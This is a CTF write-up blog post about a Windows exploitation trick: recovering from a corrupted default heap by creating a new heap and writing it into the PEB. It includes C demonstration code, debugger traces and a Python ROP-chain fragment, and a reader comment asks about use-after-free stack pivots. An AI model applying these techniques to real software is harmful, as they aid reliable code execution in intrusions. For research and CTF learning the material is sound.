Skip to content

Windows user-mode exploitation trick – refreshing the main process heap

During the weekend of May 21-23 (directly after the CONFidence CTF that we organized with Dragon Sector), qualifications to the famous DEF CON CTF 2016 took place. We obviously participated in what is probably the most binary heavy, challenging and competitive CTF of the year, eventually ending up 9th on the final scoreboard, which was sufficient to get us qualified to the main event. :-)

While the competition featured a great number of tasks to solve, including multiple pwnables in the CGC (Cyber Grand Challenge) formula, I must admit that I spent nearly the entire CTF working on a single challenge: a vulnerable Windows x86 executable called easier, authored by Thing2. After two full days of hacking by myself, and developing a ROP chain together with Gynvael for the last few hours, we managed to get the flag just in time – roughly 25 minutes before the end of the CTF. Overall, the problem was the second with fewest successful solves (completed by a total of 5 teams – PPP, DEFKOR, 9447, Samurai and Dragon Sector), and considering that it was available since the start of the contest (contrary to secrfrevenge), it was probably the most difficult challenge of all.

The source code of the task is available on LegitBS’ github: here. If you are interested in reading a complete (but quite different than ours) solution of the 9447 team, check out the following article: Def Con Quals 2016 – Easier [Pwnable].

The CTF challenge

For some basic context, the task was a very small executable, with DEP and ASLR enabled, running on Windows Server 2012 (Amazon EC2) under AppJailLauncher. It used symmetric encryption with a static key for communication, and allowed the network client to perform 8 operations, all centered around a list of allocations on the heap. There were plenty of vulnerabilities, or at least code constructs which appeared as such, but turned out to be unusable in practice. This made me wonder if I was missing something, the author was trolling hard, or if they just didn’t sufficiently test the task. Now I know it wasn’t #1 (since other players had the same thoughts), but I still don’t know which of options #2 and #3 it is. :)

Of course there were still primitives which eventually allowed to achieve arbitrary code execution: we could allocate buffers of controlled size on the heap, free them multiple times (double-free), reuse them (use-after-free), and overread / overwrite them to a very controlled extent. On the other hand, there were still many significant obstacles to overcome:

  • The heap on the organizers’ server behaved in a very different way compared to my local environment. Even when testing on the exact same system with the same cloud provider (Windows Server 2012 on Amazon EC2), there were still vast inconsistencies in the allocation patterns (even though they would were mostly consistent within the same machine). I spent a fair amount of time figuring out allocation sizes which would reproduce the same results both locally and remotely.
  • Even being able to control the heap, and consequently get an arbitrary read/write primitive, we would only be limited to tampering with the heap and static data in executable images (with no access to, for example, the stack). This was still far from getting EIP control, as the task itself didn’t provide any means to hijack control flow (in the form of function pointers, vtables etc.). Instead, a generic technique had to be used. Dougall achieved it by locating a vtable pointer to std::locale::_Locimp on the heap on the remote server, and blindly finished the exploit from there. I also found the vtable pointer, but conversely, only in my local setup. In the end, I managed to discover and disclose a stack address from the heap memory and use it to write a ROP chain directly there. That is, however, a subject for another post. :)
  • As a result of my exploitation technique used, I always had the heap slightly corrupted when entering the ROP chain. Since the chain would contain API calls such as CreateFile, ReadFile or WriteFile, which internally operate on the heap as well, the process would just crash in the allocator before the flag could be sent back to me. This post describes how we addressed the problem during the CTF (props to Gynvael for suggesting the idea). I haven’t seen this modest technique described or used anywhere publicly, but if it was, please let me know.

Overall, given how limited options were provided by the task itself, it was necessary to invent universal, Windows-specific tricks to obtain the flag. I have personally learned a lot during this exercise, and will be sharing other techniques or considerations I came up with that weekend on this blog shortly. I’ll also release the full exploit code as soon as I clean it up a bit. :)

Corrupted default process heap

Let’s assume that the application we are exploiting operates solely on the default heap (returned by the GetProcessHeap API call), and in the process of getting code / ROP execution, its structures get inevitably corrupted. When we then try to call any high-level API to perform some meaningful operation in the system, chances are that the function will crash before returning execution, or even calling into the kernel. This is illustrated in the code below, which allocates a buffer of 16 bytes, overwrites it with extra 24 bytes, and subsequently invokes the standard CreateFileA API:

#include <Windows.h>
#include <stdio.h>
#include <tchar.h>

int _tmain(int argc, _TCHAR* argv[]) {
  CHAR cBuffer[128] = { 0 };
  DWORD dwNumberOfBytesProcessed;

  LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, 16);
  RtlFillMemory(lpBuffer, 40, 'A');

  HANDLE hFile = CreateFileA("flag.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  ReadFile(hFile, cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  
  return 0;
}

Starting the program will typically result in the following or similar crash:

Critical error detected c0000374
(1464.3d4c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=775736ab edx=0030f345 esi=00430000 edi=0048dca8
eip=775ce815 esp=0030f598 ebp=0030f610 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!RtlReportCriticalFailure+0x29:
775ce815 cc int 3

0:000> kb
ChildEBP RetAddr Args to Child 
0030f610 775cf749 c0000374 77604270 0030f654 ntdll!RtlReportCriticalFailure+0x29
0030f620 775cf829 00000002 0524b3ed 00430000 ntdll!RtlpReportHeapFailure+0x21
0030f654 775cfa92 00000003 00430000 0048dca8 ntdll!RtlpLogHeapFailure+0xa1
0030f6ac 7758ab23 00430000 0048dca8 00000000 ntdll!RtlpAnalyzeHeapFailure+0x25b
0030f790 77533431 00000012 00000020 004300c4 ntdll!RtlpAllocateHeap+0x62b
0030f814 7752e74c 00430000 00000000 00000012 ntdll!RtlAllocateHeap+0x23a
0030f828 7752f80e 00000012 0524bddd 00000000 ntdll!NtdllpAllocateStringRoutine+0x1b
0030f864 74f94961 0030f890 0030f878 00000001 ntdll!RtlAnsiStringToUnicodeString+0x52
0030f880 74f953a1 0030f890 00aafcec 00120010 kernel32!Basep8BitStringToDynamicUnicodeString+0x2b
0030f898 00aa1076 00aafcec 80000000 00000000 kernel32!CreateFileA+0x13
0030f944 00aa11e5 00000001 0048f9c0 0048f9f0 HeapCorrupt!wmain+0x76
0030f98c 74f9338a 7efde000 0030f9d8 77539902 HeapCorrupt!__tmainCRTStartup+0xfe
0030f998 77539902 7efde000 0524bc61 00000000 kernel32!BaseThreadInitThunk+0xe
0030f9d8 775398d5 00aa1262 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
0030f9f0 00000000 00aa1262 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b

In situations like this, it would be intuitive to try to fix up the heap by restoring the original bytes (not always possible, since they may be unknown or impossible to deduce), or inserting ones that would mimic valid heap structure and prevent the allocator from crashing. However, it should be noted that all internal API allocations are made from the default heap, whose base is stored in the PEB (Process Environment Block) structure:

.text:6B2C96E0 ; int __stdcall NtdllpAllocateStringRoutine(ULONG Size)
.text:6B2C96E0 _NtdllpAllocateStringRoutine@4 proc near
.text:6B2C96E0
.text:6B2C96E0
.text:6B2C96E0 Size            = dword ptr  8
.text:6B2C96E0
.text:6B2C96E0                 mov     edi, edi
.text:6B2C96E2                 push    ebp
.text:6B2C96E3                 mov     ebp, esp
.text:6B2C96E5                 push    [ebp+Size]      ; Size
.text:6B2C96E8                 mov     eax, large fs:30h
.text:6B2C96EE                 push    0               ; Flags
.text:6B2C96F0                 push    dword ptr [eax+18h] ; HeapHandle
.text:6B2C96F3                 call    _RtlAllocateHeap@12 ; RtlAllocateHeap(x,x,x)
.text:6B2C96F8                 pop     ebp
.text:6B2C96F9                 retn    4
.text:6B2C96F9 _NtdllpAllocateStringRoutine@4 endp
0:000> dt _TEB
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x01c EnvironmentPointer : Ptr32 Void
   +0x020 ClientId         : _CLIENT_ID
   +0x028 ActiveRpcHandle  : Ptr32 Void
   +0x02c ThreadLocalStoragePointer : Ptr32 Void
   +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
...

0:000> dt _PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 BitField         : UChar
   +0x003 ImageUsesLargePages : Pos 0, 1 Bit
   +0x003 IsProtectedProcess : Pos 1, 1 Bit
   +0x003 IsLegacyProcess  : Pos 2, 1 Bit
   +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
   +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
   +0x003 SpareBits        : Pos 5, 3 Bits
   +0x004 Mutant           : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
   +0x00c Ldr              : Ptr32 _PEB_LDR_DATA
   +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : Ptr32 Void
   +0x018 ProcessHeap      : Ptr32 Void
...

So, instead of desperately trying to fix what can’t (or is very difficult to do reliably) be fixed, we can create a completely fresh heap and insert it into PEB. Such a new heap can be generated using either a high level HeapCreate function (exported by kernel32.dll), or a low level RtlCreateHeap one (exported by ntdll.dll), both only taking trivial arguments mostly consisting of zeros. Likewise, the address of PEB can be obtained by calling an undocumented ntdll!RtlGetCurrentPeb function:

.text:6B35CF60 ; _DWORD __stdcall RtlGetCurrentPeb()
.text:6B35CF60                 public _RtlGetCurrentPeb@0
.text:6B35CF60 _RtlGetCurrentPeb@0 proc near
.text:6B35CF60
.text:6B35CF60                 mov     eax, large fs:18h
.text:6B35CF66                 mov     eax, [eax+30h]
.text:6B35CF69                 retn
.text:6B35CF69 _RtlGetCurrentPeb@0 endp

In the case of the easier DEF CON challenge, we had already leaked the base address of NTDLL, meaning we knew the addresses of both necessary functions. It was then only a matter of finding the right gadgets to save the fresh heap into PEB, which turned out to be quite easy. Below is the part of Gynvael’s ROP chain responsible for the entire process:

def nt_RtlGetCurrentPeb():
  return ''.join([
      ntdd(0x6b35cf60)
  ])

def xchg_edi_eax():
  # 0x6b28c776    xchg edi, eax
  # 0x6b28c777    ret 0x0
  return ''.join([
      ntdd(0x6b28c776),
  ])

def nt_RtlCreateHeap():
  return ''.join([
      ntdd(0x6b2dc060),
      ntdd(0x6b28221f),  # ret to compensate for params
      dd(2),
      dd(0) * 5
  ])

def poke_edi_18_eax():
  # 0x6b358a6f    mov [edi+0x18], eax
  # 0x6b358a72    xor eax, eax
  # 0x6b358a74    pop edi
  # 0x6b358a75    pop esi
  # 0x6b358a76    ret
  return ''.join([
      ntdd(0x6b358a6f),
      dd(0), dd(0)
  ])

def fix_heap():
  return ''.join([
      nt_RtlGetCurrentPeb(),
      xchg_edi_eax(),
      nt_RtlCreateHeap(),
      poke_edi_18_eax(),
  ])

The same result can be reproduced with a slightly modified version of the previous program, which now creates a new heap, inserts it into PEB, verifies that it is fully valid by calling HeapValidate, and then proceeds to reading the “flag.txt” file and printing out its contents:

#include <Windows.h>
#include <stdio.h>
#include <tchar.h>

extern "C" {
  PVOID WINAPI RtlGetCurrentPeb();
  PVOID WINAPI RtlCreateHeap(ULONG, PVOID, SIZE_T, SIZE_T, PVOID, PVOID);
}  // extern "C"

VOID FixHeap() {
  PVOID pNewHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);
  ((PVOID *)RtlGetCurrentPeb())[0x18 / sizeof(PVOID)] = pNewHeap;
}

int _tmain(int argc, _TCHAR* argv[]) {
  CHAR cBuffer[128] = { 0 };
  DWORD dwNumberOfBytesProcessed;

  LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, 16);
  RtlFillMemory(lpBuffer, 40, 'A');

  FixHeap();
  HeapValidate(GetProcessHeap(), 0, NULL);

  HANDLE hFile = CreateFileA("flag.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  ReadFile(hFile, cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  
  return 0;
}

The new program now successfully prints out the flag:

c:\HeapCorrupt\Release>HeapCorrupt.exe
FLAG{Heap_Successfully_Recovered}

And that’s it! While the trick is trivial in principle, we were quite happy that we thought about it on spot, with less than 40 minutes until the end of the competition, and the qualification to the grand DEF CON CTF finals at stake. Perhaps someone else will find it equally useful, too. :)

MSVCRT heap caching

If the target Windows application also happens to use standard library functions (such as printffopen etc.), it will depend on the Microsoft Visual C Run-Time Library (MSVCRT), either by importing from an external DLL, or having the necessary functions linked statically. In either case, it may be useful to keep in mind that the library keeps its own copy of the pointer to the default process heap in static memory, in a variable called _crtheap. The pointer is only initialized once, in the _heap_init function, invoked in the default program prologue before main:

.text:0040301A ; int __cdecl _heap_init()
.text:0040301A __heap_init     proc near               ; CODE XREF: __tmainCRTStartup+5C
.text:0040301A                 call    ds:__imp__GetProcessHeap@0 ; GetProcessHeap()
.text:00403020                 xor     ecx, ecx
.text:00403022                 mov     __crtheap, eax
.text:00403027                 test    eax, eax
.text:00403029                 setnz   cl
.text:0040302C                 mov     eax, ecx
.text:0040302E                 retn
.text:0040302E __heap_init     endp

That pointer is then reused in the memory allocator (malloc, realloc, free), which is internally used by other standard, high-level functions, without any further references to GetProcessHeap. If your ROP chain or shellcode uses any functions from the standard library, the second pointer to overwrite could be something to keep in mind.

{ 1 } Comments

  1. hansraj rai | 28-Jul-17 at 08:28:54 | Permalink

    i know this is off topic but i didnt know how to contact you. Iam a big fan of yours and would love to learn from you and someday become an exploit dev pro in india. Ive been trying to create a rop chain for windows 8 but it seems like a really challenging task.

    They say that for a use after free i should create a string object of the size of the item freed, then put the address of a stack pivot instruction like xchg esp, eax etc.
    then put the arguments to virtualprotect to the saved stack pointer like
    mov [eax], edx; then decrement eax by 4. basically this is the method taught by
    dan rosenberg, but i dont know how to get the address of the heap (where my shellcode is) on the stack. Could you please help me understand this thing. May be you can point me in the right direction.

    Regards,
    Hansraj rai

Post a Comment

Your email is never published nor shared. Required fields are marked *